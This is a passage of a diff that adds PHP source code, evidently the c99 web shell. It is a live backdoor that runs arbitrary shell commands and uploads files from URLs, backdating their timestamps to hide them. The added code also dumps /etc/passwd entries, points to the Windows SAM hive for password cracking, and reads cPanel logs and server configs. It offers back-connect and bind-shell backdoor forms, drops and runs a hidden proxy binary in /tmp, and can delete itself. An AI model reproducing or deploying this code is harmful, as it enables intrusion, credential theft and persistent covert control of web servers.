+   $ow = posix_getpwuid(fileowner($d));
+   $gr = posix_getgrgid(filegroup($d));
+   $row[] = ($ow["name"]?$ow["name"]:fileowner($d))."/".($gr["name"]?$gr["name"]:filegroup($d));
+  }
+  echo "<tr><td><b>Perms</b></td><td><a href=\"".$surl."act=chmod&d=".urlencode($d)."\"><b>".view_perms_color($d)."</b></a><tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d))."</td></tr><tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d))."</td></tr><tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d))."</td></tr></table><br>";
+ }
+}
+if ($act == "phpinfo") {@ob_clean(); phpinfo(); c99shexit();}
+if ($act == "security")
+{
+ echo "<center><b>Server Information:</b></center><b>Open base dir: ".$hopenbasedir."</b><br>";
+ if (!$win)
+ {
+  if ($nixpasswd)
+  {
+   if ($nixpasswd == 1) {$nixpasswd = 0;}
+   echo "<b>*nix /etc/passwd:</b><br>";
+   if (!is_numeric($nixpwd_s)) {$nixpwd_s = 0;}
+   if (!is_numeric($nixpwd_e)) {$nixpwd_e = $nixpwdperpage;}
+   echo "<form action=\"".$surl."\"><input type=hidden name=act value=\"security\"><input type=hidden name=\"nixpasswd\" value=\"1\"><b>From:</b>&nbsp;<input type=\"text=\" name=\"nixpwd_s\" value=\"".$nixpwd_s."\">&nbsp;<b>To:</b>&nbsp;<input type=\"text\" name=\"nixpwd_e\" value=\"".$nixpwd_e."\">&nbsp;<input type=submit value=\"View\"></form><br>";
+   $i = $nixpwd_s;
+   while ($i < $nixpwd_e)
+   {
+    $uid = posix_getpwuid($i);
+    if ($uid)
+    {
+     $uid["dir"] = "<a href=\"".$surl."act=ls&d=".urlencode($uid["dir"])."\">".$uid["dir"]."</a>";
+     echo join(":",$uid)."<br>";
+    }
+    $i++;
+   }
+  }
+  else {echo "<br><a href=\"".$surl."act=security&nixpasswd=1&d=".$ud."\"><b><u>Get /etc/passwd</u></b></a><br>";}
+ }
+ else
+ {
+  $v = $_SERVER["WINDIR"]."\repair\sam";
+  if (file_get_contents($v)) {echo "<b><font color=red>You can't crack winnt passwords(".$v.") </font></b><br>";}
+  else {echo "</br><b><font color=green>You can crack winnt passwords. <a href=\"".$surl."act=f&f=sam&d=".$_SERVER["WINDIR"]."\\repair&ft=download\"><u><b>Download</b></u></a>, and use lcp.crack+ �.</font></b><br>";}
+ }
+ if (file_get_contents("/etc/userdomains")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=userdomains&d=".urlencode("/etc")."&ft=txt\"><u><b>View cpanel user-domains logs</b></u></a></font></b><br>";}
+ if (file_get_contents("/var/cpanel/accounting.log")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=accounting.log&d=".urlencode("/var/cpanel/")."\"&ft=txt><u><b>View cpanel logs</b></u></a></font></b><br>";}
+ if (file_get_contents("/usr/local/apache/conf/httpd.conf")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=httpd.conf&d=".urlencode("/usr/local/apache/conf")."&ft=txt\"><u><b>Apache configuration (httpd.conf)</b></u></a></font></b><br>";}
+ if (file_get_contents("/etc/httpd.conf")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=httpd.conf&d=".urlencode("/etc")."&ft=txt\"><u><b>Apache configuration (httpd.conf)</b></u></a></font></b><br>";}
+ if (file_get_contents("/etc/syslog.conf")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=syslog.conf&d=".urlencode("/etc")."&ft=txt\"><u><b>Syslog configuration (syslog.conf)</b></u></a></font></b><br>";}
+ if (file_get_contents("/etc/motd")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=motd&d=".urlencode("/etc")."&ft=txt\"><u><b>Message Of The Day</b></u></a></font></b><br>";}
+ if (file_get_contents("/etc/hosts")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=hosts&d=".urlencode("/etc")."&ft=txt\"><u><b>Hosts</b></u></a></font></b><br>";}
+ function displaysecinfo($name,$value) {if (!empty($value)) {if (!empty($name)) {$name = "<b>".$name." - </b>";} echo $name.nl2br($value)."<br>";}}
+ displaysecinfo("OS Version?",myshellexec("cat /proc/version"));
+ displaysecinfo("Kernel version?",myshellexec("sysctl -a | grep version"));
+ displaysecinfo("Distrib name",myshellexec("cat /etc/issue.net"));
+ displaysecinfo("Distrib name (2)",myshellexec("cat /etc/*-realise"));
+ displaysecinfo("CPU?",myshellexec("cat /proc/cpuinfo"));
+ displaysecinfo("RAM",myshellexec("free -m"));
+ displaysecinfo("HDD space",myshellexec("df -h"));
+ displaysecinfo("List of Attributes",myshellexec("lsattr -a"));
+ displaysecinfo("Mount options ",myshellexec("cat /etc/fstab"));
+ displaysecinfo("Is cURL installed?",myshellexec("which curl"));
+ displaysecinfo("Is lynx installed?",myshellexec("which lynx"));
+ displaysecinfo("Is links installed?",myshellexec("which links"));
+ displaysecinfo("Is fetch installed?",myshellexec("which fetch"));
+ displaysecinfo("Is GET installed?",myshellexec("which GET"));
+ displaysecinfo("Is perl installed?",myshellexec("which perl"));
+ displaysecinfo("Where is apache",myshellexec("whereis apache"));
+ displaysecinfo("Where is perl?",myshellexec("whereis perl"));
+ displaysecinfo("locate proftpd.conf",myshellexec("locate proftpd.conf"));
+ displaysecinfo("locate httpd.conf",myshellexec("locate httpd.conf"));
+ displaysecinfo("locate my.conf",myshellexec("locate my.conf"));
+ displaysecinfo("locate psybnc.conf",myshellexec("locate psybnc.conf"));
+}
+if ($act == "mkfile")
+{
+ if ($mkfile != $d)
+ {
+  if (file_exists($mkfile)) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: object alredy exists";}
+  elseif (!fopen($mkfile,"w")) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: access denied";}
+  else {$act = "f"; $d = dirname($mkfile); if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} $f = basename($mkfile);}
+ }
+ else {$act = $dspact = "ls";}
+}
+if ($act == "encoder")
+{
+ echo "<script>function set_encoder_input(text) {document.forms.encoder.input.value = text;}</script><b>Encoder:</b></br></br><form name=\"encoder\" action=\"".$surl."\" method=POST><input type=hidden name=act value=encoder><b>Input:</b><br><textarea name=\"encoder_input\" id=\"input\" cols=50 rows=5>".@htmlspecialchars($encoder_input)."</textarea><br><br><input type=submit value=\"calculate\"><br><br><b>Hashes</b>:</br></br>";
+ foreach(array("md5","crypt","sha1","crc32") as $v)
+ {
+  echo $v." - <input type=text size=50 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".$v($encoder_input)."\" readonly><br>";
+ }
+ echo "</br><b>Url:</b><br>urlencode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".urlencode($encoder_input)."\" readonly>
+ <br>urldecode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".htmlspecialchars(urldecode($encoder_input))."\" readonly>
+ </br></br><b>Base64:</b></br> base64_encode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".base64_encode($encoder_input)."\" readonly>";
+ echo "</br>base64_decode - ";
+ if (base64_encode(base64_decode($encoder_input)) != $encoder_input) {echo "<input type=text size=35 value=\"failed\" disabled readonly>";}
+ else
+ {
+  $debase64 = base64_decode($encoder_input);
+  $debase64 = str_replace("\0","[0]",$debase64);
+  $a = explode("\r\n",$debase64);
+  $rows = count($a);
+  $debase64 = htmlspecialchars($debase64);
+  if ($rows == 1) {echo "<input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".$debase64."\" id=\"debase64\" readonly>";}
+  else {$rows++; echo "<textarea cols=\"40\" rows=\"".$rows."\" onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" id=\"debase64\" readonly>".$debase64."</textarea>";}
+  echo "&nbsp;<a href=\"#\" onclick=\"set_encoder_input(document.forms.encoder.debase64.value)\"><b></b></a>";
+ }
+ echo "</br></br><b>Base convertations</b>:</br></br>dec2hex - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"";
+ $c = strlen($encoder_input);
+ for($i=0;$i<$c;$i++)
+ {
+  $hex = dechex(ord($encoder_input[$i]));
+  if ($encoder_input[$i] == "&") {echo $encoder_input[$i];}
+  elseif ($encoder_input[$i] != "\\") {echo "%".$hex;}
+ }
+ echo "\" readonly><br></form>";
+}
+if ($act == "backc")
+{
+ $ip = $_SERVER["REMOTE_ADDR"];
+ $msg = $_POST['backcconnmsg'];
+ $emsg = $_POST['backcconnmsge'];
+ echo("<b>Back-Connection:</b></br></br><form name=form method=POST>Host:<input type=text name=backconnectip size=15 value=$ip> Port: <input type=text name=backconnectport size=15 value=5992> Use: <select size=1 name=use><option value=Perl>Perl</option><option value=C>C</option></select> <input type=submit name=submit value=Connect></form>Click 'Connect' only after you open port for it first. Once open, use NetCat, and run '<b>nc -l -n -v -p 5992</b>'<br><br>");
+ echo("$msg");
+ echo("$emsg");
+}
+
+if ($act == "shbd"){
+$msg = $_POST['backcconnmsg'];
+$emsg = $_POST['backcconnmsge'];
+echo("<b>Bind Shell Backdoor:</b></br></br><form name=form method=POST>
+Bind Port: <input type='text' name='backconnectport' value='5992'>
+<input type='hidden' name='use' value='shbd'>
+<input type='submit' value='Install Backdoor'></form>");
+echo("$msg");
+echo("$emsg");
+}
+
+
+if ($act == "proxy") {
+ cf("/tmp/hantu.tgz",$proxy_shit);
+ ex("cd /tmp;tar -zxvf hantu.tgz");
+ ex("cd /tmp;cd .setan;chmod 777 xh");
+ ex("cd /tmp;cd .setan;chmod 777 httpd");
+ ex("cd /tmp;cd .setan;./xh -s [kmod] ./httpd start");
+ checkproxyhost();
+ $msg = $_POST['proxyhostmsg'];
+ echo("$msg");
+ unlink("/tmp/hantu.tgz");
+ ex("cd /tmp; rm -r .setan"); 
+}
+
+if ($act == "selfremove")
+{
+ if (($submit == $rndcode) and ($submit != ""))
+ {
+  if (unlink(__FILE__)) {@ob_clean(); echo "Gone!"; c99shexit(); }
+  else {echo "<center><b>Can't delete ".__FILE__."!</b></center>";}
+ }
+ else
+ {
+  if (!empty($rndcode)) {echo "<b>Error: incorrect confimation!</b>";}
+  $rnd = rand(0,9).rand(0,9).rand(0,9);
+  echo "<form action=\"".$surl."\"><input type=hidden name=act value=selfremove><b>Self-remove: ".__FILE__." </br></br>For confirmation, enter \"".$rnd."\"</b>:&nbsp;<input type=hidden name=rndcode value=\"".$rnd."\"><input type=text name=submit>&nbsp;<input type=submit value=\"YES\"></form>";
+ }
+}
+if ($act == "search"){
+ echo "<b>Search file-system:</b></br></br>";
+ if (empty($search_in)) {$search_in = $d;}
+ if (empty($search_name)) {$search_name = "(.*)"; $search_name_regexp = 1;}
+ if (empty($search_text_wwo)) {$search_text_regexp = 0;}
+ if (!empty($submit))
+ {
+  $found = array();
+  $found_d = 0;
+  $found_f = 0;
+  $search_i_f = 0;
+  $search_i_d = 0;
+  $a = array
+  (
+   "name"=>$search_name, "name_regexp"=>$search_name_regexp,
+   "text"=>$search_text, "text_regexp"=>$search_text_regxp,
+   "text_wwo"=>$search_text_wwo,
+   "text_cs"=>$search_text_cs,
+   "text_not"=>$search_text_not
+  );
+  $searchtime = getmicrotime();
+  $in = array_unique(explode(";",$search_in));
+  foreach($in as $v) {c99fsearch($v);}
+  $searchtime = round(getmicrotime()-$searchtime,4);
+  if (count($found) == 0) {echo "<b>No files found!</b>";}
+  else
+  {
+   $ls_arr = $found;
+   $disp_fullpath = TRUE;
+   $act = "ls";
+  }
+ }
+ echo "<form method=POST>
+<input type=hidden name=\"d\" value=\"".$dispd."\"><input type=hidden name=act value=\"".$dspact."\">
+<b>File/folder name: </b><input type=\"text\" name=\"search_name\" size=\"".round(strlen($search_name)+25)."\" value=\"".htmlspecialchars($search_name)."\">&nbsp;<input type=\"checkbox\" name=\"search_name_regexp\" value=\"1\" ".($search_name_regexp == 1?" checked":"")."> - regexp
+<br><b>Directory:&nbsp;&nbsp; </b><input type=\"text\" name=\"search_in\" size=\"".round(strlen($search_in)+25)."\" value=\"".htmlspecialchars($search_in)."\">
+<br><b>Text:</b>&nbsp;&nbsp;<input type=text name=\"search_text\" size=42 value=".htmlspecialchars($search_text).">
+
+<br><br><input type=\"checkbox\" name=\"search_text_regexp\" value=\"1\" ".($search_text_regexp == 1?" checked":"")."> - regexp
+&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_wwo\" value=\"1\" ".($search_text_wwo == 1?" checked":"")."> - <u>w</u>hole words only
+&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_cs\" value=\"1\" ".($search_text_cs == 1?" checked":"")."> - cas<u>e</u> sensitive
+&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_not\" value=\"1\" ".($search_text_not == 1?" checked":"")."> - find files <u>NOT</u> containing the text
+<br><br><input type=submit name=submit value=\"Search\"></form>";
+ if ($act == "ls") {$dspact = $act; echo "<hr size=\"1\" noshade><b>Search took ".$searchtime." secs (".$search_i_f." files and ".$search_i_d." folders, ".round(($search_i_f+$search_i_d)/$searchtime,4)." objects per second).</b><br><br>";}
+}
+if ($act == "chmod")
+{
+ $mode = fileperms($d.$f);
+ if (!$mode) {echo "<b>Change file-mode with error:</b> can't get current value.";}
+ else
+ {
+  $form = TRUE;
+  if ($chmod_submit)
+  {
+   $octet = "0".base_convert(($chmod_o["r"]?1:0).($chmod_o["w"]?1:0).($chmod_o["x"]?1:0).($chmod_g["r"]?1:0).($chmod_g["w"]?1:0).($chmod_g["x"]?1:0).($chmod_w["r"]?1:0).($chmod_w["w"]?1:0).($chmod_w["x"]?1:0),2,8);
+   if (chmod($d.$f,$octet)) {$act = "ls"; $form = FALSE; $err = "";}
+   else {$err = "Can't chmod to ".$octet.".";}
+  }
+  if ($form)
+  {
+   $perms = parse_perms($mode);
+   echo "<b>Changing file-mode (".$d.$f."), ".view_perms_color($d.$f)." (".substr(decoct(fileperms($d.$f)),-4,4).")</b><br>".($err?"<b>Error:</b> ".$err:"")."<form action=\"".$surl."\" method=POST><input type=hidden name=d value=\"".htmlspecialchars($d)."\"><input type=hidden name=f value=\"".htmlspecialchars($f)."\"><input type=hidden name=act value=chmod><table align=left width=300 border=0 cellspacing=0 cellpadding=5><tr><td><b>Owner</b><br><br><input type=checkbox NAME=chmod_o[r] value=1".($perms["o"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox name=chmod_o[w] value=1".($perms["o"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_o[x] value=1".($perms["o"]["x"]?" checked":"").">eXecute</td><td><b>Group</b><br><br><input type=checkbox NAME=chmod_g[r] value=1".($perms["g"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox NAME=chmod_g[w] value=1".($perms["g"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_g[x] value=1".($perms["g"]["x"]?" checked":"").">eXecute</font></td><td><b>World</b><br><br><input type=checkbox NAME=chmod_w[r] value=1".($perms["w"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox NAME=chmod_w[w] value=1".($perms["w"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_w[x] value=1".($perms["w"]["x"]?" checked":"").">eXecute</font></td></tr><tr><td><input type=submit name=chmod_submit value=\"Save\"></td></tr></table></form>";
+  }
+ }
+}
+if ($act == "upload")
+{
+ $uploadmess = "";
+ $uploadpath = str_replace("\\",DIRECTORY_SEPARATOR,$uploadpath);
+ if (empty($uploadpath)) {$uploadpath = $d;}
+ elseif (substr($uploadpath,-1) != "/") {$uploadpath .= "/";}
+ if (!empty($submit))
+ {
+  global $HTTP_POST_FILES;
+  $uploadfile = $HTTP_POST_FILES["uploadfile"];
+  if (!empty($uploadfile["tmp_name"]))
+  {
+   if (empty($uploadfilename)) {$destin = $uploadfile["name"];}
+   else {$destin = $userfilename;}
+   if (!move_uploaded_file($uploadfile["tmp_name"],$uploadpath.$destin)) {$uploadmess .= "Error uploading file ".$uploadfile["name"].". Can't copy \"".$uploadfile["tmp_name"]."\" to \"".$uploadpath.$destin."\".</br></br>";}
+  }
+  elseif (!empty($uploadurl))
+  {
+   if (!empty($uploadfilename)) {$destin = $uploadfilename;}
+   else
+   {
+    $destin = explode("/",$destin);
+    $destin = $destin[count($destin)-1];
+    if (empty($destin))
+    {
+     $i = 0;
+     $b = "";
+     while(file_exists($uploadpath.$destin)) {if ($i > 0) {$b = "_".$i;} $destin = "index".$b.".html"; $i++;}}
+   }
+   if ((!eregi("http://",$uploadurl)) and (!eregi("https://",$uploadurl)) and (!eregi("ftp://",$uploadurl))) {echo "<b>Incorect url!</b><br>";}
+   else
+   {
+    $st = getmicrotime();
+    $content = @file_get_contents($uploadurl);
+    $dt = round(getmicrotime()-$st,4);
+    if (!$content) {$uploadmess .=  "Can't download file!<br>";}
+    else
+    {
+     if ($filestealth) {$stat = stat($uploadpath.$destin);}
+     $fp = fopen($uploadpath.$destin,"w");
+     if (!$fp) {$uploadmess .= "Error writing to file ".htmlspecialchars($destin)."!<br>";}
+     else
+     {
+      fwrite($fp,$content,strlen($content));
+      fclose($fp);
+      if ($filestealth) {touch($uploadpath.$destin,$stat[9],$stat[8]);}
+     }
+    }
+   }
+  }
+ }
+ if ($miniform)
+ {
+  echo "<b>".$uploadmess."</b>";
+  $act = "ls";
+ }
+ else
+ {
+  echo "<b>File upload:</b><br><b>".$uploadmess."</b><form enctype=\"multipart/form-data\" action=\"".$surl."act=upload&d=".urlencode($d)."\" method=POST>
+Select file on your local computer: <input name=\"uploadfile\" type=\"file\"><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;or<br>
+Input URL: <input name=\"uploadurl\" type=\"text\" value=\"".htmlspecialchars($uploadurl)."\" size=\"70\"><br><br>
+Save this file dir: <input name=\"uploadpath\" size=\"70\" value=\"".$dispd."\"><br><br>
+File-name (auto-fill): <input name=uploadfilename size=25><br><br>
+<input type=checkbox name=uploadautoname value=1 id=df4>&nbsp;convert file name to lovercase<br><br>
+<input type=submit name=submit value=\"Upload\">
+</form>";
+ }
+}
+if ($act == "delete")
+{
+ $delerr = "";
+ foreach ($actbox as $v)
+ {
+  $result = FALSE;
+  $result = fs_rmobj($v);
+  if (!$result) {$delerr .= "Can't delete ".htmlspecialchars($v)."<br>";}
+ }
+ if (!empty($delerr)) {echo "<b>Deleting with errors:</b><br>".$delerr;}
+ $act = "ls";
+}
+if (!$usefsbuff)
+{
+ if (($act == "paste") or ($act == "copy") or ($act == "cut") or ($act == "unselect")) {echo "<center><b>Sorry, buffer is disabled. For enable, set directive \"\$useFSbuff\" as TRUE.</center>";}
+}
+else
+{
+ if ($act == "copy") {$err = ""; $sess_data["copy"] = array_merge($sess_data["copy"],$actbox); c99_sess_put($sess_data); $act = "ls"; }
+ elseif ($act == "cut") {$sess_data["cut"] = array_merge($sess_data["cut"],$actbox); c99_sess_put($sess_data); $act = "ls";}
+ elseif ($act == "unselect") {foreach ($sess_data["copy"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["copy"][$k]);}} foreach ($sess_data["cut"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["cut"][$k]);}} c99_sess_put($sess_data); $act = "ls";}
+ if ($actemptybuff) {$sess_data["copy"] = $sess_data["cut"] = array(); c99_sess_put($sess_data);}
+ elseif ($actpastebuff)
+ {
+  $psterr = "";
+  foreach($sess_data["copy"] as $k=>$v)
+  {
+   $to = $d.basename($v);
+   if (!fs_copy_obj($v,$to)) {$psterr .= "Can't copy ".$v." to ".$to."!<br>";}
+   if ($copy_unset) {unset($sess_data["copy"][$k]);}
+  }
+  foreach($sess_data["cut"] as $k=>$v)
+  {
+   $to = $d.basename($v);
+   if (!fs_move_obj($v,$to)) {$psterr .= "Can't move ".$v." to ".$to."!<br>";}
+   unset($sess_data["cut"][$k]);
+  }
+  c99_sess_put($sess_data);
+  if (!empty($psterr)) {echo "<b>Pasting with errors:</b><br>".$psterr;}
+  $act = "ls";
+ }
+ elseif ($actarcbuff)
+ {
+  $arcerr = "";
+  if (substr($actarcbuff_path,-7,7) == ".tar.gz") {$ext = ".tar.gz";}
+  else {$ext = ".tar.gz";}
+  if ($ext == ".tar.gz") {$cmdline = "tar cfzv";}
+  $cmdline .= " ".$actarcbuff_path;
+  $objects = array_merge($sess_data["copy"],$sess_data["cut"]);
+  foreach($objects as $v)
+  {
+   $v = str_replace("\\",DIRECTORY_SEPARATOR,$v);
+   if (substr($v,0,strlen($d)) == $d) {$v = basename($v);}
+   if (is_dir($v))
+   {
+    if (substr($v,-1) != DIRECTORY_SEPARATOR) {$v .= DIRECTORY_SEPARATOR;}
+    $v .= "*";
+   }
+   $cmdline .= " ".$v;
+  }
+  $tmp = realpath(".");
+  chdir($d);
+  $ret = myshellexec($cmdline);
+  chdir($tmp);
+  if (empty($ret)) {$arcerr .= "Can't call archivator (".htmlspecialchars(str2mini($cmdline,60)).")!<br>";}
+  $ret = str_replace("\r\n","\n",$ret);
+  $ret = explode("\n",$ret);
+  if ($copy_unset) {foreach($sess_data["copy"] as $k=>$v) {unset($sess_data["copy"][$k]);}}
+  foreach($sess_data["cut"] as $k=>$v)
+  {
+   if (in_array($v,$ret)) {fs_rmobj($v);}
+   unset($sess_data["cut"][$k]);
+  }
+  c99_sess_put($sess_data);
+  if (!empty($arcerr)) {echo "<b>Archivation errors:</b><br>".$arcerr;}
+  $act = "ls";
+ }
+ elseif ($actpastebuff)
+ {
+  $psterr = "";
+  foreach($sess_data["copy"] as $k=>$v)
+  {
+   $to = $d.basename($v);
+   if (!fs_copy_obj($v,$d)) {$psterr .= "Can't copy ".$v." to ".$to."!<br>";}
+   if ($copy_unset) {unset($sess_data["copy"][$k]);}
+  }
+  foreach($sess_data["cut"] as $k=>$v)
+  {
+   $to = $d.basename($v);
+   if (!fs_move_obj($v,$d)) {$psterr .= "Can't move ".$v." to ".$to."!<br>";}
+   unset($sess_data["cut"][$k]);
+  }
+  c99_sess_put($sess_data);
+  if (!empty($psterr)) {echo "<b>Pasting with errors:</b><br>".$psterr;}
+  $act = "ls";
+ }
+}
+if ($act == "cmd")
+{
+if (trim($cmd) == "ps aux") {$act = "processes";}
+elseif (trim($cmd) == "tasklist") {$act = "processes";}
+else
+{
+ @chdir($chdir);
+ if (!empty($submit))
+ {
+  $execcmd = $_REQUEST['cmd'];
+  echo "Result Of Locally Executed Command: <b>$execcmd</b></br>";
+  $olddir = realpath(".");
+  @chdir($d);
+  $ret = myshellexec($cmd);
+  $ret = convert_cyr_string($ret,"d","w");
+  if ($cmd_txt)
+  {
+   $rows = count(explode("\r\n",$ret))+1;
+   if ($rows < 10) {$rows = 10;}
+   echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>";
+  }
+  else {echo $ret."<br>";}
+  @chdir($olddir);
+ }
+ else {echo "<b>Execution command</b>"; if (empty($cmd_txt)) {$cmd_txt = TRUE;}}
+ echo "<form action=\"".$surl."\" method=POST><input type=hidden name=act value=cmd><textarea name=cmd cols=122 rows=10>".htmlspecialchars($cmd)."</textarea><input type=hidden name=\"d\" value=\"".$dispd."\"><br><br><input type=submit name=submit value=\"Execute\">&nbsp;Display in text-area&nbsp;<input type=\"checkbox\" name=\"cmd_txt\" value=\"1\""; if ($cmd_txt) {echo " checked";} echo "></form>";
+}
+}
+if ($act == "ls")
+{
+ if (count($ls_arr) > 0) {$list = $ls_arr;}
+ else
+ {
+  $list = array();
+  if ($h = @opendir($d))
+  {
+   while (($o = readdir($h)) !== FALSE) {$list[] = $d.$o;}
+   closedir($h);
+  }
+  else {}
+ }
+ if (count($list) == 0) {echo "<center><b>Can't open folder ".htmlspecialchars($d)."</b></center>";}
+ else
+ {
+  //Building array
+  $objects = array();
+  $vd = "f"; //Viewing mode
+  if ($vd == "f")
+  {
+   $objects["head"] = array();
+   $objects["folders"] = array();
+   $objects["links"] = array();
+   $objects["files"] = array();
+   foreach ($list as $v)
+   {
+    $o = basename($v);
+    $row = array();
+    if ($o == ".") {$row[] = $d.$o; $row[] = "LINK";}
+    elseif ($o == "..") {$row[] = $d.$o; $row[] = "LINK";}
+    elseif (is_dir($v))
+    {
+     if (is_link($v)) {$type = "LINK";}
+     else {$type = "DIR";}
+     $row[] = $v;
+     $row[] = $type;
+    }
+    elseif(is_file($v)) {$row[] = $v; $row[] = filesize($v);}
+    $row[] = filemtime($v);
+    if (!$win)
+    {
+     $ow = posix_getpwuid(fileowner($v));
+     $gr = posix_getgrgid(filegroup($v));
+     $row[] = ($ow["name"]?$ow["name"]:fileowner($v))."/".($gr["name"]?$gr["name"]:filegroup($v));
+    }
+    $row[] = fileperms($v);
+    if (($o == ".") or ($o == "..")) {$objects["head"][] = $row;}
+    elseif (is_link($v)) {$objects["links"][] = $row;}
+    elseif (is_dir($v)) {$objects["folders"][] = $row;}
+    elseif (is_file($v)) {$objects["files"][] = $row;}
+    $i++;
+   }
+   $row = array();
+   $row[] = "<b>Name</b>";
+   $row[] = "<b>Size</b>";
+   $row[] = "<b>Modify</b>";
+   if (!$win)
+  {$row[] = "<b>Owner/Group</b>";}
+   $row[] = "<b>Perms</b>";
+   $row[] = "<b>Action</b>";
+   $parsesort = parsesort($sort);
+   $sort = $parsesort[0].$parsesort[1];
+   $k = $parsesort[0];
+   if ($parsesort[1] != "a") {$parsesort[1] = "d";}
+   $y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$k.($parsesort[1] == "a"?"d":"a")."\">";
+   $y .= "[Sort-".($parsesort[1] == "a"?"Asc.":"Desc")."]</a>";
+   $row[$k] .= $y;
+   for($i=0;$i<count($row)-1;$i++)
+   {
+    if ($i != $k) {$row[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$i.$parsesort[1]."\">".$row[$i]."</a>";}
+   }
+   $v = $parsesort[0];
+   usort($objects["folders"], "tabsort");
+   usort($objects["links"], "tabsort");
+   usort($objects["files"], "tabsort");
+   if ($parsesort[1] == "d")
+   {
+    $objects["folders"] = array_reverse($objects["folders"]);
+    $objects["files"] = array_reverse($objects["files"]);
+   }
+   $objects = array_merge($objects["head"],$objects["folders"],$objects["links"],$objects["files"]);
+   $tab = array();
+   $tab["cols"] = array($row);
+   $tab["head"] = array();
+   $tab["folders"] = array();
+   $tab["links"] = array();
+   $tab["files"] = array();
+   $i = 0;
+   foreach ($objects as $a)
+   {
+    $v = $a[0];
+    $o = basename($v);
+    $dir = dirname($v);
+    if ($disp_fullpath) {$disppath = $v;}
+    else {$disppath = $o;}
+    $disppath = str2mini($disppath,60);
+    if (in_array($v,$sess_data["cut"])) {$disppath = "<strike>".$disppath."</strike>";}
+    elseif (in_array($v,$sess_data["copy"])) {$disppath = "<u>".$disppath."</u>";}
+    foreach ($regxp_highlight as $r)
+    {
+     if (ereg($r[0],$o))
+     {
+      if ((!is_numeric($r[1])) or ($r[1] > 3)) {$r[1] = 0; ob_clean(); echo "Warning! Configuration error in \$regxp_highlight[".$k."][0] - unknown command."; c99shexit();}
+      else
+      {
+       $r[1] = round($r[1]);
+       $isdir = is_dir($v);
+       if (($r[1] == 0) or (($r[1] == 1) and !$isdir) or (($r[1] == 2) and !$isdir))
+       {
+        if (empty($r[2])) {$r[2] = "<b>"; $r[3] = "</b>";}
+        $disppath = $r[2].$disppath.$r[3];
+        if ($r[4]) {break;}
+       }
+      }
+     }
+    }
+    $uo = urlencode($o);
+    $ud = urlencode($dir);
+    $uv = urlencode($v);
+    $row = array();
+    if ($o == ".")
+    {
+     $row[] = "&nbsp;<a href=\"".$surl."act=".$dspact."&d=".urlencode(realpath($d.$o))."&sort=".$sort."\">".$o."</a>";
+     $row[] = "LINK";
+    }
+    elseif ($o == "..")
+    {
+     $row[] = "&nbsp;<a href=\"".$surl."act=".$dspact."&d=".urlencode(realpath($d.$o))."&sort=".$sort."\">".$o."</a>";
+     $row[] = "LINK";
+    }
+    elseif (is_dir($v))
+    {
+     if (is_link($v))
+     {
+      $disppath .= " => ".readlink($v);
+      $type = "LINK";
+      $row[] =  "&nbsp;<a href=\"".$surl."act=ls&d=".$uv."&sort=".$sort."\">[".$disppath."]</a>";
+     }
+     else
+     {
+      $type = "DIR";
+      $row[] =  "&nbsp;<a href=\"".$surl."act=ls&d=".$uv."&sort=".$sort."\">[".$disppath."]</a>";
+      }
+     $row[] = $type;
+    }
+    elseif(is_file($v))
+    {
+     $ext = explode(".",$o);
+     $c = count($ext)-1;
+     $ext = $ext[$c];
+     $ext = strtolower($ext);
+     $row[] =  "&nbsp;<a href=\"".$surl."act=f&f=".$uo."&d=".$ud."&\">".$disppath."</a>";
+     $row[] = view_size($a[1]);
+    }
+    $row[] = date("d.m.Y H:i:s",$a[2]);
+    if (!$win) {$row[] = $a[3];}
+    $row[] = "<a href=\"".$surl."act=chmod&f=".$uo."&d=".$ud."\"><b>".view_perms_color($v)."</b></a>";
+    if ($o == ".") {$checkbox = "<input type=\"checkbox\" name=\"actbox[]\" onclick=\"ls_reverse_all();\">"; $i--;}
+    else {$checkbox = "<input type=\"checkbox\" name=\"actbox[]\" id=\"actbox".$i."\" value=\"".htmlspecialchars($v)."\">";}
+    if (is_dir($v)) {$row[] = "<a href=\"".$surl."act=d&d=".$uv."\">[Info]</a>&nbsp;".$checkbox;}
